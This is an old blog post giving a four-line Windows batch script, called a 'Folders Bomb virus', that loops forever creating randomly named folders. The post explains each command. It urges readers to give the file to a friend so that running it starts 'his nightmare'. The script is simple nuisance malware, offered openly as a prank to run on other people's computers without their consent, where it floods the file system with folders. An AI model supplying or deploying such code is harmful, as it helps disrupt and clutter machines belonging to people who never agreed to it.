Sunday, December 2, 2012

Trick to create the Folders Bomb virus in PC


Create the virus on your PC and irritate your friends by trying it in theirs. LOL!

This batch file will create 3000+ folder in less than a minute.
Open your notepad and type the following codes.


@echo off
:top
md %random%
goto top


Save it as 3000.bat

Give this file to your friend and when he will click on that his nightmare will be started.


Above Code Explained.

@echo off makes your command prompt window blank. md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and


%random% means folders with random names.) goto top- retures the command to :top which causes an infinite loop.

eNJOY.

Content  Provided By :

KamalTheHackingGeek.

1 comment:

Post Your Comments Here! Please don't forget to mention your name and e-mail address.